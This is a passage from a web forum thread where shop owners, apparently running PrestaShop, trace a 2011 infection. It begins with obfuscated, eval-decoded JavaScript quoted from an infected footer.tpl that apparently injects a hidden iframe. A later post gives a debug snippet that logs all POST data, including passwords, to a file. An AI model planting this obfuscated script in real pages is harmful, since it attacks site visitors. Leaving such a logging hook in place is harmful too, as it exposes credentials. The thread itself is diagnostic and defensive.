o,118-o,103-o,42-o,36-o,62-o,107-o,104-o,116-o,99-o,111-o,103-o,34-o,117-o,116-o,101-o,63-o,41-o,106-o,118-o,118-o,114-

 

o,60-o,49-o,49-o,101-o,110-o,107-o,101-o,109-o,111-o,103-o,36-o,45-o,122-o,45-o,123-o,45-o,36-o,48-o,104-o,107-o,110-

 

o,103-o,99-o,120-o,103-o,48-o,101-o,113-o,111-o,41-o,34-o,121-o,107-o,102-o,118-o,106-o,63-o,50-o,34-o,106-o,103-o,107-

 

o,105-o,106-o,118-o,63-o,50-o,64-o,36-o,43-o,61-o];mm=''.asd();for(i=0;i<m.length;i++)s+=mm(e("m"+"["+"i"+"]"));e

 

(s);</script> <script>String.prototype.asd=function(){return

 

String.fromCharCode;};Object.prototype.asd="e";try{for(i in{})if(~i.indexOf('as'))throw 1;}catch(q){zxc={};}

 

v=document.createTextNode('asd');var s="";for(i in v)if(i=='childNodes')o=v.length+1;o*=2;e=eval;m=[120-o,99-o,116-

 

o,34-o,102-o,34-o,63-o,34-o,112-o,103-o,121-o,34-o,70-o,99-o,118-o,103-o,42-o,43-o,61-o,120-o,99-o,116-o,34-o,122-o,63-

 

o,85-o,118-o,116-o,107-o,112-o,105-o,48-o,104-o,116-o,113-o,111-o,69-o,106-o,99-o,116-o,69-o,113-o,102-o,103-o,42-o,79-

 

o,99-o,118-o,106-o,48-o,104-o,110-o,113-o,113-o,116-o,42-o,102-o,48-o,105-o,103-o,118-o,70-o,99-o,118-o,103-o,42-o,43-

 

o,49-o,52-o,43-o,45-o,59-o,57-o,43-o,61-o,34-o,120-o,99-o,116-o,34-o,123-o,63-o,85-o,118-o,116-o,107-o,112-o,105-o,48-

 

o,104-o,116-o,113-o,111-o,69-o,106-o,99-o,116-o,69-o,113-o,102-o,103-o,42-o,102-o,48-o,105-o,103-o,118-o,74-o,113-o,119

 

-o,116-o,117-o,42-o,43-o,45-o,59-o,57-o,43-o,61-o,102-o,113-o,101-o,119-o,111-o,103-o,112-o,118-o,48-o,121-o,116-o,107-

 

o,118-o,103-o,42-o,36-o,62-o,107-o,104-o,116-o,99-o,111-o,103-o,34-o,117-o,116-o,101-o,63-o,41-o,106-o,118-o,118-o,114-

 

o,60-o,49-o,49-o,101-o,110-o,107-o,101-o,109-o,111-o,103-o,36-o,45-o,122-o,45-o,123-o,45-o,36-o,48-o,104-o,107-o,110-

 

o,103-o,99-o,120-o,103-o,48-o,101-o,113-o,111-o,41-o,34-o,121-o,107-o,102-o,118-o,106-o,63-o,50-o,34-o,106-o,103-o,107-

 

o,105-o,106-o,118-o,63-o,50-o,64-o,36-o,43-o,61-o];mm=''.asd();for(i=0;i<m.length;i++)s+=mm(e("m"+"["+"i"+"]"));e

 

(s);</script></body>"

 

my footer.tpl had the code in it. Also I had the strange files in upload and download which i've deleted and renamed the directories. I'm hoping that works. Is there any way to stop this from happening again?

Share this post


Link to post
Share on other sites

Hello,

for those who can reproduce this bug in localhost, can you please remade an install, and before you do any action on your prestashop please add the following code :

		if ($_POST)
	{
		$fd = fopen(_PS_ROOT_DIR_.'/log_her.txt', 'a');
		fwrite($fd, var_export($_POST, true).var_export($_SERVER, true)."\n");
		fclose($fd);
	}

bellow the code

	function __construct()
{

in file admin/tabs/adminModules.php. Once you have noticed the presence of her.php infection, please send me per MP the log file her_log.txt in your Prestashop root folder, thank you :D

 

Reading all posts here, it seems the upload / download files and code in footer.tpl are being added when a password is keyed into the admin login on screen.

I have an uninfected shop, footer.tlp is as it should be and upload / download only have index.php.

 

Using this shop, I added the code above to the file, uploaded it. logged out of admin, checked upload / download and footer.tpl, all clean.

relogged in typing the password. WHOA! upload / download have new files, footer.tpl has extra code but no sign of her.php in modules and no log_her.txt in root!

This her.php is being created at a different time than everything else.

I will search through the log files and post anything with her.php

 

Hope this helps.

 

Neller

Share this post


Link to post
Share on other sites

Just in case I made some "protection" to my site. My site was not affected - but newer knows.

I changed the footer.tpl file permissions to 444

Also I made one her.php file to /modules folder with permissions 400

 

When attacker can still rewrite these files - then we have some problems with webserver

Share this post


Link to post
Share on other sites

I mentioned than I had the same code in footer.tpl like in post #84.

 

download and upload folder renamed

footer.tpl set permissions to 444.

Share this post


Link to post
Share on other sites

The only entry for her.php in logs was (url removed);

blah-blah.com my.ip.add.ress - - [24/Aug/2011:11:25:56 +0100] "GET /modules/her.php HTTP/1.1" 200 - "http://blahblah.com/admin/" "Mozilla/5.0 (Windows NT 6.0; rv:6.0) Gecko/20100101 Firefox/6.0"

Share this post


Link to post
Share on other sites

One of my stores (1.4.3) got hacked too, funny that the only request to her.php was from my ip address.

Share this post


Link to post
Share on other sites